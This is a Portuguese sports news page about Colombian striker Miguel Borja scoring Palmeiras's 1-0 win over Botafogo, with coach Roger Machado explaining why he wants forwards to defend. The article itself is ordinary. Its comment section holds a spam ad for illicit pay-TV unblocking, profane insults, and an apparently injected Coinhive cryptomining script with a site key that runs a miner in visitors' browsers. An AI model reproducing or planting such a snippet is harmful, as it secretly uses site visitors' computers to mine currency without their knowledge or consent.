Multifuncional, Borja marca e agrada Roger Machado no Palmeiras

22/1/2018 08:53

Multifuncional, Borja marca e agrada Roger Machado no Palmeiras

Atacante tem sido orientado a participar mais da construção das jogadas

Multifuncional, Borja marca e agrada Roger Machado no Palmeiras

Borja marcou o gol da vitória do Palmeiras. Foto: Cesar Greco/Ag. Palmeiras



Roger Machado tem uma função especial como técnico do Palmeiras. Se não bastassem as (fortes) cobranças por resultados, títulos e um bom rendimento do time em campo, terá um desafio extra: recuperar o bom futebol de Miguel Borja, algo que seus antecessores Eduardo Baptista e Cuca, não conseguiram.







Contratado no início do ano passado como a principal esperança de gols para o ataque palmeirense, o colombiano ainda não atingiu alto nível em solo brasileiro. Roger Machado sabe que se conseguir recuperar e extrair a qualidade técnica de Borja, terá um grande "reforço" no seu ataque, além de um clima favorável na relação com torcedores, diretoria e investidores.



Sob o forte calor em Ribeirão Preto (SP), Borja marcou o gol da vitória sobre o Botafogo por 1 a 0, resultado que dá ao Palmeiras a liderança isolada do Grupo C com seis pontos, dois à frente de Novorizontino e São Bento, com 100% de aproveitamento.



No comando de Roger Machado, o colombiano vem agregando funções. Além de colocar a bola para dentro do gol, está sendo orientado a contribuir mais com o setor defensivo na marcação, quando o adversário estiver com a posse de bola. Na visão do treinador, recuperar a posse de bola já no campo de ataque aumentam as chances de gols e diminuem a sobrecarga sobre o setor defensivo.



"Para mim é muito importante o gol, porque reforça o que tenho falado com o Borja no início do ano, da participação dele nos dois momentos do jogo: atacando e defendendo", disse. O treinador alerta que, quando os jogadores de ataque participam do processo defensivo, na maioria das vezes acabam recompensados com gols. "Uma proporção ideal é que eu consiga ter 70% das ações defensivas e 30% dos jogadores da frente. Quando acontece esta razão, o porcentual de aproveitamento com vitória aumenta".



O gol do colombiano foi bastante festejado por Roger Machado porque serve como exemplo para todos no elenco. "Para mim era importante o Borja fazer gols, comprovar o que dizemos não só para ele, mas para os jogadores que tenho, muito ofensivos e que vão nos dar muitas chances de gol. Mas preciso de uma equipe equilibrada".



Ele reconhece que Borja sofreu mais do que o normal para se adaptar ao Brasil, dentro e fora de campo. Mas, passado um ano, torce para que o colombiano faça aquilo que melhor sabe: gols. "Todos ficamos felizes com o Borja. Ano passado foi um ano de adaptação a um novo país, nova cultura. Agora as coisas começam bem".



Sob o forte calor de Ribeirão Preto (32ºC no início do confronto), o Palmeiras não rendeu bem, principalmente no primeiro tempo. Sem poder lutar contra o calor e com os jogadores ainda fora do preparo físico ideal, ao menos, foi inteligente. Tocou a bola, manteve a posse, mas pouco criou. Na etapa final, aumentou o ritmo, marcou o gol, dominou a partida e rendeu o adversário. "No segundo tempo sofremos menos, porque controlamos melhor os espaços e isto para mim é bastante importante", destacou Roger Machado.



VEJA TAMBÉM
- ORGULHO MUITO GRANDE! Abel exalta as crias do Verdão após vitória na Libertadores
- Palmeiras é forte candidato ao título do Super Mundial, afirma Neto.
- Veiga reconhece fase ruim e elogia Luís Guilherme pelo gol marcado.





3918 visitas - Fonte: Estadão

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

Borja no primeiro jogo foi um dos melhores jogadores em campo ,dois gols nasceram , com participação dele...

Borja no primeiro jogo foi um dos melhores jogadores em campo ,dois gols nasceram , com participação dele...

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Rafael Pontes pau no cu

idiota esse Rafael....
enfia no cu esta postagem,...ninguém quer saber disto.....

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras